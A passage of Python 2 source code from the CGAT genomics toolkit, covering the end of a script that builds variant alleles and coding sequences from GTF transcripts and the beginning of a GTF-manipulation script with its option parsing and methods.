exon_sequence = exons[exon_key]
exon_seq = "".join(exon_sequence)
cds.append(exon_seq)
_addCds2Reference(map_cds2reference,
lcds,
exon_sequence,
exon.start)
lcds = len(exon_seq)
if len(exon_seq) != exon.end - exon.start:
nframeshifts += 1
# add first exon to genome position
genome_pos = genome_start + len(exon_seq)
last_end = exon.end
# correct for deletions at start/end of exon
start_offset, end_offset = _getEndOffsets(exon_sequence)
# length of original transcript
loriginal = sum([x.end - x.start for x in transcript])
if E.global_options.loglevel >= 8:
print "%i: exon_indels (%i-%i):" % (allele_id, exon.start, exon.end)
for x, c in enumerate(exons[exon_key]):
if len(c) != 1:
print x + exon.start, ":%s:" % c
print
print exons[exon_key]
print "genome_pos=", genome_pos, \
",exon=%i-%i" % (genome_pos, genome_pos + len(exon_seq)), \
", len(exon_seq)=", len(exon_seq), \
", len(exon)=", exon.end - exon.start, \
", offsets=%i,%i," % (start_offset, end_offset), \
", offset at start=", _getOffset( exon.start, offsets), \
", offset at end=", _getOffset(exon.end, offsets)
for exon in transcript[1:]:
last_exon_sequence = exon_sequence
last_start_offset, last_end_offset = start_offset, end_offset
# get the next intron/exon parameters
exon_key = (exon.start, exon.end)
exon_sequence = exons[exon_key]
start_offset, end_offset = _getEndOffsets(exon_sequence)
intron_key = (last_end, exon.start)
if last_end == exon.start:
# catch empty introns
intron_sequence = []
intron_key = None
else:
intron_sequence = introns[intron_key]
intron_seq = "".join(intron_sequence)
###################################################
###################################################
###################################################
# add preceding intron
new_exon = True
if len(intron_seq) > frameshiftsize:
intron_name, intron_seq5, intron_seq3 = Genomics.GetIntronType(
intron_seq)
if intron_name == "unknown":
if intron_seq[:2].islower() and intron_seq[-2:].islower():
E.debug("%s: transcript has unknown splice signal - kept because not a variant: %s: %s:%s" %
(transcript_id, intron_name, intron_seq5, intron_seq3))
nsplice_noncanonical += 1
else:
is_splice_truncated = True
E.debug("%s: transcript has splice truncated allele: %s: %s:%s" %
(transcript_id, intron_name, intron_seq5, intron_seq3))
break
# start a new exon
cds_starts.append(lcds)
else:
# treat as frameshifting intron
#
# frame-shifting introns are checked if they are
# fixed by indels either in the intron itself or
# the terminal exon sequence. To this end, the effective
# size of the intron is computed:
# effective size of intron =
# indels at terminal x bases at previous exon
# + size of intron
# + indels at terminal x bases at next exon
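                    # Hedged numeric illustration (numbers made up): a 4 bp
                    # intron with a 2 bp insertion within the last
                    # `frameshiftsize` bases of the preceding exon has an
                    # effective size of 2 + 4 + 0 = 6, which is divisible
                    # by 3, so the intron can be kept in frame below.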
effective_intron_size = len(intron_seq)
previous_indels = _sumIndels(
last_exon_sequence[max(0, -frameshiftsize):])
next_indels = _sumIndels(exon_sequence[:frameshiftsize])
effective_intron_size += previous_indels + next_indels
if previous_indels + next_indels == 0 and len(intron_seq) % 3 == 0:
has_stop = "X" in Genomics.translate(intron_seq.upper(),
is_seleno=is_seleno)
else:
has_stop = False
if effective_intron_size % 3 == 0 and not has_stop:
E.debug("%s: fixed frame-shifting intron %i-%i of size %i (size:%i, indels:%i,%i)" %
(transcript_id, last_end, exon.start,
effective_intron_size,
len(intron_seq),
previous_indels, next_indels,))
# add to previous exon
cds.append(intron_seq)
lcds += len(intron_seq)
ncorrected_frameshifts += 1
new_exon = False
else:
E.debug("%s: could not fix frame-shifting intron %i-%i of size %i (size:%i, indels:%i,%i, has_stop=%i)" %
(transcript_id, last_end, exon.start,
effective_intron_size,
len(intron_seq),
previous_indels, next_indels,
has_stop))
nuncorrected_frameshifts += 1
# start a new exon
cds_starts.append(lcds)
if E.global_options.loglevel >= 8:
print "%i: intron_indels (%i-%i):" % (allele_id, last_end, exon.start)
if intron_key:
for x, c in enumerate(introns[intron_key]):
if len(c) != 1:
print x + last_end, ":%s:" % c
print
print introns[intron_key]
print "genome_pos=", genome_pos, \
",intron=%i-%i" % (genome_pos, genome_pos + len(intron_seq)), \
", len(intron_seq)=", len(intron_seq), \
", len(intron)=", exon.start - last_end, \
", offset at start=", _getOffset( last_end, offsets), \
", offset at end=", _getOffset(exon.start, offsets)
else:
print "empty intron"
genome_pos += len(intron_seq)
# assertion - check if genomic coordinate of intron is consistent
# with offset
test_offset = _getOffset(exon.start, offsets)
is_offset = genome_pos - exon.start
assert is_offset == test_offset, "intron offset difference: %i != %i" % (
is_offset, test_offset)
###################################################
###################################################
###################################################
# add the exon
exon_seq = "".join(exon_sequence)
cds.append(exon_seq)
if len(exon_seq) != exon.end - exon.start:
nframeshifts += 1
if new_exon:
if reference_coordinates:
exon_starts.append(exon.start + start_offset)
else:
exon_starts.append(genome_pos)
_addCds2Reference(map_cds2reference,
lcds,
exon_sequence,
exon.start)
lcds += len(exon_seq)
last_end = exon.end
if E.global_options.loglevel >= 8:
print "%i: exon_indels (%i-%i):" % (allele_id, exon.start, exon.end)
for x, c in enumerate(exons[exon_key]):
if len(c) != 1:
print x + exon.start, ":%s:" % c
print
print exons[exon_key]
print "genome_pos=", genome_pos, \
",exon=%i-%i" % (genome_pos, genome_pos + len(exon_seq)), \
", len(exon_seq)=", len(exon_seq), \
", len(exon)=", exon.end - exon.start, \
", offsets=%i,%i," % (start_offset, end_offset), \
", offset at start=", _getOffset( exon.start, offsets), \
", offset at end=", _getOffset(exon.end, offsets)
genome_pos += len(exon_seq)
test_offset = _getOffset(exon.end, offsets)
is_offset = genome_pos - exon.end
assert is_offset == test_offset, "exon offset difference: %i != %i" % (
is_offset, test_offset)
cds = "".join(cds)
assert lcds == len(cds)
# fix incomplete codons at the end of the sequence
if lcds % 3 != 0:
offset = lcds % 3
cds = cds[:-offset]
# add frame correction for transcripts that do not start at frame=0
start_frame = (3 - (int(transcript[0].frame) % 3)) % 3
# n are ignored (? in sequence to deal with genes like Muc2)
peptide = Genomics.translate("n" * start_frame + cds,
is_seleno=is_seleno,
prefer_lowercase=False,
ignore_n=True)
# find the first stop codon
if start_frame != 0:
# ignore first, potentially incomplete base
pep_first_stop = peptide.upper().find("X", 1)
else:
pep_first_stop = peptide.upper().find("X")
E.debug("%s: translated peptide = %s, first stop at %i" %
(transcript_id, peptide, pep_first_stop))
peptide = peptide.replace("?", "x")
if E.global_options.loglevel >= 8:
E.debug("peptide=%s" % peptide)
E.debug("cds=%s" % cds)
E.debug("%s: start_frame=%i, first stop at %i/%i" % (transcript_id,
start_frame,
pep_first_stop,
len(peptide)))
lpeptide, lcds = len(peptide), len(cds)
# check for non-sense mediated decay
if pep_first_stop != -1:
cds_first_stop = pep_first_stop * 3 - start_frame
if cds_first_stop < cds_starts[-1]:
if ncorrected_frameshifts or nuncorrected_frameshifts:
E.warn("nmd knockout transcript %s has frameshifts: %i corrected, %i uncorrected" %
(transcript_id,
ncorrected_frameshifts,
nuncorrected_frameshifts))
is_nmd_knockout = True
cds = peptide = ""
lpeptide, lcds = 0, 0
reference_first_stop_start, reference_first_stop_end = \
(map_cds2reference.mapRowToCol(cds_first_stop),
map_cds2reference.mapRowToCol(cds_first_stop + 3))
elif pep_first_stop < len(peptide) - 1:
is_stop_truncated = True
cds = cds[:cds_first_stop]
                peptide = peptide[:pep_first_stop]
lpeptide, lcds = len(peptide), len(cds)
reference_first_stop_start, reference_first_stop_end = \
(map_cds2reference.mapRowToCol(cds_first_stop),
map_cds2reference.mapRowToCol(cds_first_stop + 3))
else:
E.warn("first stop at %i(cds=%i) ignored: last exon start at %i" %
(pep_first_stop,
cds_first_stop,
cds_starts[-1]))
else:
# -1 for no stop codon found
pep_first_stop = -1
cds_first_stop = -1
lpeptide, lcds = len(peptide), len(cds)
        if is_nmd_knockout and nframeshifts == 0:
E.warn(
"transcript %s is knockout, though there are no indels - must be nonsense mutation" % (transcript_id))
# build frames
frames = [start_frame]
start = start_frame
l = 0
for end in cds_starts[1:]:
l += end - start
frames.append((3 - l % 3) % 3)
start = end
return Allele._make((cds,
peptide,
len(cds_starts),
cds_starts,
exon_starts,
frames,
is_nmd_knockout,
is_splice_truncated,
is_stop_truncated,
nframeshifts,
ncorrected_frameshifts,
nuncorrected_frameshifts,
pep_first_stop,
lpeptide,
cds_first_stop,
lcds,
reference_first_stop_start,
reference_first_stop_end,
loriginal,
nsplice_noncanonical,
)), map_cds2reference
if variant_exons or variant_introns:
for allele in range(0, 2):
exons = dict([(x, y[allele])
for x, y in variant_exons.iteritems()])
introns = dict([(x, y[allele])
for x, y in variant_introns.iteritems()])
result.append(
_buildAllele(allele, transcript, exons, introns, offsets[allele]))
else:
a = _buildAllele(0, transcript, reference_exons, reference_introns, [])
result.append(a)
result.append(a)
return result
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: gtf2alleles.py 2886 2010-04-07 08:47:46Z andreas $", usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome [default=%default].")
parser.add_option("-t", "--tablename", dest="tablename", type="string",
help="tablename to get variants from (in samtools pileup format) [default=%default].")
parser.add_option("-d", "--database", dest="database", type="string",
help="sqlite3 database [default=%default].")
parser.add_option("-f", "--exons-file", dest="filename_exons", type="string",
help="filename with transcript model information (gtf formatted file) [default=%default].")
parser.add_option("-r", "--filename-reference", dest="filename_reference", type="string",
help="filename with transcript models of a reference gene set. Stop codons that do not"
" overlap any of the exons in this file are ignore (gtf-formatted file) [default=%default].")
parser.add_option("--vcf-file", dest="filename_vcf", type="string",
help="filename with variants in VCF format. Should be indexed by tabix [default=%default].")
parser.add_option("--pileup-file", dest="filename_pileup", type="string",
help="filename with variants in samtools pileup format. Should be indexed by tabix [default=%default].")
parser.add_option("--vcf-sample", dest="vcf_sample", type="string",
help="sample id for species of interest in vcf formatted file [default=%default].")
parser.add_option("-s", "--seleno-tsv-file", dest="filename_seleno", type="string",
help="filename of a list of transcript ids that are selenoproteins [default=%default].")
parser.add_option("-m", "--module", dest="modules", type="choice", action="append",
choices=("gene-counts", "transcript-effects"),
help="modules to apply [default=%default].")
parser.add_option("-o", "--output-section", dest="output", type="choice", action="append",
choices=("all", "peptide", "cds", "table", "gtf", "map"),
help="sections to output [default=%default].")
parser.add_option("-k", "--with-knockouts", dest="with_knockouts", action="store_true",
help="add alleles that are knocked out to fasta and gtf files [default=%default].")
parser.set_defaults(
genome_file=None,
filename_exons=None,
        filename_reference=None,
filename_seleno=None,
modules=[],
border=200,
separator="|",
tablename=None,
database="csvdb",
output=[],
with_knockouts=False,
filename_vcf=None,
vcf_sample=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
ninput, nskipped, noutput = 0, 0, 0
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
if options.filename_seleno:
seleno = set(IOTools.readList(open(options.filename_seleno, "r")))
else:
        seleno = set()
infile_gtf = GTF.gene_iterator(GTF.iterator(options.stdin))
# acquire variants from SQLlite database
if options.tablename:
if not options.database:
raise ValueError("please supply both database and tablename")
variant_getter = VariantGetterSqlite(
options.database, options.tablename)
elif options.filename_pileup:
variant_getter = VariantGetterPileup(options.filename_pileup)
elif options.filename_vcf:
variant_getter = VariantGetterVCF(
options.filename_vcf, options.vcf_sample)
else:
raise ValueError("please specify a source of variants.")
if len(options.output) == 0 or "all" in options.output:
output_all = True
else:
output_all = False
if "cds" in options.output or output_all:
outfile_cds = E.openOutputFile("cds.fasta")
else:
outfile_cds = None
if "map" in options.output or output_all:
outfile_map = E.openOutputFile("map.psl")
else:
outfile_map = None
if "peptide" in options.output or output_all:
outfile_peptides = E.openOutputFile("peptides.fasta")
else:
outfile_peptides = None
if "table" in options.output or output_all:
outfile_alleles = E.openOutputFile("table")
outfile_alleles.write("\t".join(
("gene_id",
"transcript_id", "allele_id", "contig", "strand",
"is_wildtype",
("\t".join(Allele._fields)))) + "\n")
else:
outfile_alleles = None
if "gtf" in options.output or output_all:
outfile_gtf = E.openOutputFile("gtf")
else:
outfile_gtf = None
    # id separator
separator = options.separator
for transcripts in infile_gtf:
gene_id = transcripts[0][0].gene_id
overall_start = min([min([x.start for x in y]) for y in transcripts])
overall_end = max([max([x.end for x in y]) for y in transcripts])
contig = transcripts[0][0].contig
strand = transcripts[0][0].strand
is_positive_strand = Genomics.IsPositiveStrand(strand)
lcontig = fasta.getLength(contig)
E.info("%s: started processing on %s:%i..%i (%s)" %
(gene_id, contig, overall_start, overall_end, strand))
ninput += 1
extended_start = max(0, overall_start - options.border)
extended_end = min(lcontig, overall_end + options.border)
# if contig.startswith("chr"): contig = contig[3:]
variants = variant_getter(contig, extended_start, extended_end)
E.debug("%s: found %i variants in %s:%i..%i" %
(gene_id, len(variants), contig, extended_start, extended_end))
if E.global_options.loglevel >= 10:
print "# collected variants:", variants
# collect intron/exon sequences
# coordinates are forward/reverse
# also updates the coordinates in transcripts
all_exons, all_introns = collectExonIntronSequences(transcripts, fasta)
# update variants such that they use the same coordinates
# as the transcript
variants = Variants.updateVariants(variants, lcontig, strand)
# deal with overlapping but consistent variants
variants = Variants.mergeVariants(variants)
E.debug("%s: found %i variants after merging in %s:%i..%i" %
(gene_id, len(variants), contig, extended_start, extended_end))
if E.global_options.loglevel >= 10:
print "# merged variants:", variants
# collect coordinate offsets and remove conflicting variants
variants, removed_variants, offsets = Variants.buildOffsets(
variants, contig=contig)
if len(removed_variants) > 0:
E.warn("removed %i conflicting variants" % len(removed_variants))
for v in removed_variants:
E.info("removed variant: %s" % str(v))
E.info("%i variants after filtering" % len(variants))
if len(variants) > 0:
# build variants
indexed_variants = Variants.indexVariants(variants)
# update exon sequences according to variants
variant_exons = buildVariantSequences(indexed_variants, all_exons)
# update intron sequences according to variants
variant_introns = buildVariantSequences(
indexed_variants, all_introns)
if E.global_options.loglevel >= 10:
for key in variant_exons:
print "exon", key
Genomics.printPrettyAlignment(
all_exons[key],
variant_exons[key][0],
variant_exons[key][1],
)
for key in variant_introns:
print "intron", key
Genomics.printPrettyAlignment(
all_introns[key][:30] + all_introns[key][-30:],
variant_introns[key][0][:30] +
variant_introns[key][0][-30:],
variant_introns[key][1][:30] + variant_introns[key][1][-30:])
else:
variant_exons, variant_introns = None, None
for transcript in transcripts:
transcript.sort(key=lambda x: x.start)
transcript_id = transcript[0].transcript_id
alleles = buildAlleles(transcript,
variant_exons,
variant_introns,
all_exons,
all_introns,
offsets,
is_seleno=transcript_id in seleno,
reference_coordinates=False,
)
##############################################################
##############################################################
##############################################################
# output
for aid, al in enumerate(alleles):
allele, map_cds2reference = al
reference_cds_sequence = buildCDSSequence(
transcript, all_exons)
is_wildtype = reference_cds_sequence == allele.cds
allele_id = str(aid)
assert len(allele.exon_starts) == allele.nexons
assert len(allele.cds_starts) == allele.nexons
assert len(allele.frames) == allele.nexons
# the output id
outid = separator.join((gene_id, transcript_id, allele_id))
# output map between cds and reference
if outfile_map and map_cds2reference:
match = Blat.Match()
match.mQueryId = allele_id
match.mQueryLength = allele.cds_len
match.mSbjctId = contig
match.mSbjctLength = lcontig
match.strand = strand
match.fromMap(map_cds2reference, use_strand=True)
outfile_map.write("%s\n" % str(match))
# only output sequences for genes that have not been knocked
# out, unless required
if not allele.is_nmd_knockout or options.with_knockouts:
if outfile_gtf:
gtf = GTF.Entry()
gtf.gene_id = gene_id
gtf.transcript_id = transcript_id
gtf.addAttribute("allele_id", allele_id)
gtf.contig = contig
gtf.strand = strand
gtf.feature = "CDS"
gtf.source = "gtfxnsps"
l = 0
last_cds_start = allele.cds_starts[0]
gtf.start = allele.exon_starts[0]
gtf.frame = allele.frames[0]
for exon_start, cds_start, frame in zip(allele.exon_starts[1:],
allele.cds_starts[
1:],
allele.frames[1:]):
cds_length = cds_start - last_cds_start
gtf.end = gtf.start + cds_length
if not is_positive_strand:
gtf.start, gtf.end = lcontig - \
gtf.end, lcontig - gtf.start
outfile_gtf.write(str(gtf) + "\n")
gtf.start = exon_start
gtf.frame = frame
l += cds_length
last_cds_start = cds_start
cds_length = len(allele.cds) - last_cds_start
gtf.end = gtf.start + cds_length
if not is_positive_strand:
gtf.start, gtf.end = lcontig - \
gtf.end, lcontig - gtf.start
outfile_gtf.write(str(gtf) + "\n")
if outfile_cds:
outfile_cds.write(">%s\n%s\n" % (outid, allele.cds))
if outfile_peptides:
outfile_peptides.write(
">%s\n%s\n" % (outid, allele.peptide))
# reformat for tabular output
allele = allele._replace(
cds_starts=",".join(map(str, allele.cds_starts)),
exon_starts=",".join(map(str, allele.exon_starts)),
frames=",".join(map(str, allele.frames)))
# convert reference coordinates to positive strand coordinates
if allele.reference_first_stop_start >= 0 and not is_positive_strand:
allele = allele._replace(
reference_first_stop_start=lcontig -
allele.reference_first_stop_end,
reference_first_stop_end=lcontig - allele.reference_first_stop_start, )
if outfile_alleles:
outfile_alleles.write("%s\t%s\n" % (
"\t".join((gene_id,
transcript_id,
allele_id,
contig,
strand,
"%i" % is_wildtype)),
"\t".join(map(str, allele))))
noutput += 1
# only output first allele (debugging)
# break
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2gtf.py
```python
import sys
import re
import random
import collections
import itertools
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.Genomics as Genomics
import CGAT.Intervals as Intervals
import CGAT.IOTools as IOTools
# ------------------------------------------------------------
# This script needs some attention.
# ------------------------------------------------------------
def find_retained_introns(gene):
'''Given a bundle of transcripts, find intervals matching retained
introns. A retained intron is defined as an interval from an exon/intron
boundary to the next where both boundaries are in the same exon of another
transcript'''
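    # Hedged example (coordinates made up): with transcript A having exons
    # (0,100) and (150,300) and transcript B having a single exon (0,300),
    # A's intron (100,150) lies entirely inside B's exon, so an interval
    # (100,150) is yielded for transcript B as a retained intron.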
intron_intervals = [GTF.toIntronIntervals(transcript)
for transcript in gene]
intron_intervals = list(set(
itertools.chain.from_iterable(intron_intervals)))
intron_intervals.sort()
for transcript in gene:
exons = iter(sorted(GTF.asRanges(transcript)))
introns = iter(intron_intervals)
retained_introns = []
try:
intron = introns.next()
exon = exons.next()
while True:
if exon[1] < intron[0]:
exon = exons.next()
continue
if intron[0] >= exon[0] and intron[1] <= exon[1]:
E.debug("exon %s of transcript %s contains intron %s" %
(exon, transcript[0].transcript_id, intron))
retained_introns.append(intron)
intron = introns.next()
except StopIteration:
pass
retained_introns = Intervals.combine(retained_introns)
for intron in retained_introns:
entry = GTF.Entry()
entry = entry.copy(transcript[0])
entry.start = intron[0]
entry.end = intron[1]
yield entry
def gene_to_blocks(gene):
    '''Given a bundle of all exons in a gene, create a separate exon
    for each unique part of an exon, as well as one for the introns. '''
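    # Hedged example (coordinates made up): exons (0,100) and (50,150) in a
    # gene give the boundary set {0, 50, 100, 150}, which yields the blocks
    # (0,50), (50,100) and (100,150) with exon_id 1, 2 and 3.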
exons = [(e.start, e.end)
for e in gene if e.feature == "exon"]
exons = list(set(sum(exons, ())))
exons.sort()
entry = GTF.Entry()
entry = entry.copy(gene[0])
entry.transcript_id = "merged"
entry.feature = "exon"
entry.source = "merged"
for i in range(len(exons)-1):
entry.start = exons[i]
entry.end = exons[i+1]
entry.attributes["exon_id"] = str(i + 1)
yield entry
def main(argv=None):
if not argv:
argv = sys.argv
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--merge-exons-distance",
dest="merge_exons_distance",
type="int",
help="distance in nucleotides between "
"exons to be merged [%default].")
parser.add_option("--pattern-identifier", dest="pattern", type="string",
help="pattern to use for renaming genes/transcripts. "
"The pattern should contain a %i, for example "
"--pattern-identifier=ENSG%010i [%default].")
parser.add_option("--sort-order",
dest="sort_order",
type="choice",
choices=("gene",
"gene+transcript",
"transcript",
"position",
"contig+gene",
"position+gene",
"gene+position",
"gene+exon"),
help="sort input data [%default].")
parser.add_option("--mark-utr",
dest="mark_utr",
action="store_true",
help="mark utr for method --merge-exons. "
"[%default].")
parser.add_option(
"--without-utr",
dest="with_utr",
action="store_false",
help="exclude UTR in methods --merge-exons, merge-transcripts "
"and intersect-transripts. Setting this option will remove "
"non-coding transcripts. "
"[%default].")
parser.add_option(
"--filter-method", dest="filter_method",
type="choice",
choices=("gene",
"transcript",
"longest-gene",
"longest-transcript",
"representative-transcript",
"proteincoding",
"lincrna"),
help="Filter method to apply. Available filters are: "
"'gene': filter by gene_id given in ``--map-tsv-file``, "
"'transcript': filter by transcript_id given in ``--map-tsv-file``, "
"'longest-gene': output the longest gene for overlapping genes ,"
"'longest-transcript': output the longest transcript per gene,"
"'representative-transcript': output the representative transcript "
"per gene. The representative transcript is the transcript "
"that shares most exons with other transcripts in a gene. "
"The input needs to be sorted by gene. "
"'proteincoding': only output protein coding features. "
"'lincrna': only output lincRNA features. "
"[%default].")
parser.add_option("-a", "--map-tsv-file", dest="filename_filter",
type="string",
metavar="tsv",
help="filename of ids to map/filter [%default].")
parser.add_option(
"--gff-file", dest="filename_gff", type="string",
metavar="GFF",
help="second filename of features (see --remove-overlapping) "
"[%default]")
parser.add_option("--invert-filter",
dest="invert_filter",
action="store_true",
help="when using --filter, invert selection "
"(like grep -v). "
"[%default].")
parser.add_option("--sample-size", dest="sample_size", type="int",
help="extract a random sample of size # if the option "
"'--method=filter --filter-method' is set "
"[%default].")
parser.add_option(
"--intron-min-length",
dest="intron_min_length", type="int",
help="minimum length for introns (for --exons-file2introns) "
"[%default].")
parser.add_option("--min-exons-length",
dest="min_exons_length",
type="int",
help="minimum length for gene (sum of exons) "
"(--sam-fileple-size) [%default].")
parser.add_option(
"--intron-border",
dest="intron_border",
type="int",
help="number of residues to exclude at intron at either end "
"(--exons-file2introns) [%default].")
parser.add_option("--ignore-strand",
dest="ignore_strand",
action="store_true",
help="remove strandedness of features (set to '.') when "
"using ``transcripts2genes`` or ``filter``"
"[%default].")
parser.add_option("--permit-duplicates", dest="strict",
action="store_false",
help="permit duplicate genes. "
"[%default]")
parser.add_option(
"--duplicate-feature",
dest="duplicate_feature",
type="choice",
choices=("gene", "transcript", "both", "ucsc", "coordinates"),
help="remove duplicates by gene/transcript. "
"If ``ucsc`` is chosen, transcripts ending on _dup# are "
"removed. This is necessary to remove duplicate entries "
"that are next to each other in the sort order "
"[%default]")
parser.add_option("--use-gene-id", dest="use_geneid", action="store_true",
help="when merging transcripts, exons or introns, use "
"the parent gene_id as the transcript id.")
parser.add_option("-m", "--method", dest="method", type="choice",
action="append",
choices=(
"add-protein-id",
"exons2introns",
"filter",
"find-retained-introns",
"genes-to-unique-chunks",
"intersect-transcripts",
"join-exons",
"merge-exons",
"merge-transcripts",
"merge-genes",
"merge-introns",
"remove-overlapping",
"remove-duplicates",
"rename-genes",
"rename-transcripts",
"rename-duplicates",
"renumber-genes",
"renumber-transcripts",
"set-transcript-to-gene",
"set-gene-to-transcript",
"set-protein-to-transcript",
"set-score-to-distance",
"set-gene_biotype-to-source",
"set-source-to-transcript_biotype",
"sort",
"transcript2genes",
"unset-genes"),
help="Method to apply [%default]."
"Please only select one.")
parser.set_defaults(
sort_order="gene",
filter_method="gene",
pattern="%i",
merge_exons_distance=0,
filename_filter=None,
intron_border=None,
intron_min_length=None,
sample_size=0,
min_exons_length=0,
ignore_strand=False,
mark_utr=False,
with_utr=True,
invert_filter=False,
duplicate_feature=None,
strict=True,
method=None,
use_geneid=False,
)
(options, args) = E.Start(parser, argv=argv)
ninput, noutput, nfeatures, ndiscarded = 0, 0, 0, 0
if options.method is None:
raise ValueError("please specify a --method")
if len(options.method) > 1:
raise ValueError("multiple --method arguements specified")
else:
options.method = options.method[0]
if options.method == "set-transcript-to-gene":
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("transcript_id", gff.gene_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "set-gene_biotype-to-source":
for gff in GTF.iterator(options.stdin):
ninput += 1
if "gene_biotype" not in gff.attributes:
gff.setAttribute("gene_biotype", gff.source)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "set-source-to-transcript_biotype":
for gff in GTF.iterator(options.stdin):
ninput += 1
try:
gff.source = gff.transcript_biotype
except AttributeError:
pass
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "remove-duplicates":
counts = collections.defaultdict(int)
if options.duplicate_feature == "ucsc":
store = []
remove = set()
f = lambda x: x[0].transcript_id
gffs = GTF.transcript_iterator(
GTF.iterator(options.stdin), strict=False)
outf = lambda x: "\n".join([str(y) for y in x])
for entry in gffs:
ninput += 1
store.append(entry)
id = f(entry)
if "_dup" in id:
remove.add(re.sub("_dup\d+", "", id))
remove.add(id)
for entry in store:
id = f(entry)
if id not in remove:
options.stdout.write(outf(entry) + "\n")
noutput += 1
else:
ndiscarded += 1
E.info("discarded duplicates for %s" % (id))
else:
if options.duplicate_feature == "gene":
gffs = GTF.gene_iterator(
GTF.iterator(options.stdin), strict=False)
f = lambda x: x[0][0].gene_id
outf = lambda x: "\n".join(
["\n".join([str(y) for y in xx]) for xx in x])
elif options.duplicate_feature == "transcript":
gffs = GTF.transcript_iterator(
GTF.iterator(options.stdin), strict=False)
f = lambda x: x[0].transcript_id
outf = lambda x: "\n".join([str(y) for y in x])
elif options.duplicate_feature == "coordinates":
gffs = GTF.chunk_iterator(GTF.iterator(options.stdin))
f = lambda x: x[0].contig + "_" + \
str(x[0].start) + "-" + str(x[0].end)
outf = lambda x: "\n".join([str(y) for y in x])
store = []
for entry in gffs:
ninput += 1
store.append(entry)
id = f(entry)
counts[id] += 1
# Assumes GTF file sorted by contig then start
last_id = ""
if options.duplicate_feature == "coordinates":
for entry in store:
id = f(entry)
if id == last_id:
ndiscarded += 1
E.info("discarded duplicates for %s: %i" %
(id, counts[id]))
else:
options.stdout.write(outf(entry) + "\n")
noutput += 1
last_id = id
else:
for entry in store:
id = f(entry)
if counts[id] == 1:
options.stdout.write(outf(entry) + "\n")
noutput += 1
else:
ndiscarded += 1
E.info("discarded duplicates for %s: %i" %
(id, counts[id]))
elif "sort" == options.method:
for gff in GTF.iterator_sorted(GTF.iterator(options.stdin),
sort_order=options.sort_order):
ninput += 1
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "set-gene-to-transcript" == options.method:
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("gene_id", gff.transcript_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "set-protein-to-transcript" == options.method:
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("protein_id", gff.transcript_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "add-protein-id" == options.method:
transcript2protein = IOTools.readMap(
IOTools.openFile(options.filename_filter, "r"))
missing = set()
for gff in GTF.iterator(options.stdin):
ninput += 1
if gff.transcript_id not in transcript2protein:
if gff.transcript_id not in missing:
E.debug(
("removing transcript '%s' due to "
"missing protein id") % gff.transcript_id)
missing.add(gff.transcript_id)
ndiscarded += 1
continue
gff.setAttribute(
"protein_id", transcript2protein[gff.transcript_id])
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
E.info("transcripts removed due to missing protein ids: %i" %
len(missing))
elif "join-exons" == options.method:
for exons in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
strand = Genomics.convertStrand(exons[0].strand)
contig = exons[0].contig
transid = exons[0].transcript_id
geneid = exons[0].gene_id
biotype = exons[0].source
all_start, all_end = min([x.start for x in exons]), max(
[x.end for x in exons])
y = GTF.Entry()
y.contig = contig
y.source = biotype
y.feature = "transcript"
y.start = all_start
y.end = all_end
y.strand = strand
y.transcript_id = transid
y.gene_id = geneid
options.stdout.write("%s\n" % str(y))
elif "merge-genes" == options.method:
# merges overlapping genes
#
gffs = GTF.iterator_sorted_chunks(
GTF.flat_gene_iterator(GTF.iterator(options.stdin)),
sort_by="contig-strand-start")
def iterate_chunks(gff_chunks):
last = gff_chunks.next()
to_join = [last]
for gffs in gff_chunks:
d = gffs[0].start - last[-1].end
if gffs[0].contig == last[0].contig and \
gffs[0].strand == last[0].strand:
assert gffs[0].start >= last[0].start, \
("input file should be sorted by contig, strand "
"and position: d=%i:\nlast=\n%s\nthis=\n%s\n") % \
(d,
"\n".join([str(x) for x in last]),
"\n".join([str(x) for x in gffs]))
if gffs[0].contig != last[0].contig or \
gffs[0].strand != last[0].strand or \
d > 0:
yield to_join
to_join = []
last = gffs
to_join.append(gffs)
yield to_join
raise StopIteration
for chunks in iterate_chunks(gffs):
ninput += 1
if len(chunks) > 1:
gene_id = "merged_%s" % chunks[0][0].gene_id
transcript_id = "merged_%s" % chunks[0][0].transcript_id
info = ",".join([x[0].gene_id for x in chunks])
else:
gene_id = chunks[0][0].gene_id
transcript_id = chunks[0][0].transcript_id
info = None
intervals = []
for c in chunks:
intervals += [(x.start, x.end) for x in c]
intervals = Intervals.combine(intervals)
# take single strand
strand = chunks[0][0].strand
for start, end in intervals:
y = GTF.Entry()
y.fromGTF(chunks[0][0], gene_id, transcript_id)
y.start = start
y.end = end
y.strand = strand
if info:
y.addAttribute("merged", info)
options.stdout.write("%s\n" % str(y))
nfeatures += 1
noutput += 1
elif options.method == "renumber-genes":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
if gtf.gene_id not in map_old2new:
map_old2new[gtf.gene_id] = options.pattern % (
len(map_old2new) + 1)
gtf.setAttribute("gene_id", map_old2new[gtf.gene_id])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "unset-genes":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
key = gtf.transcript_id
if key not in map_old2new:
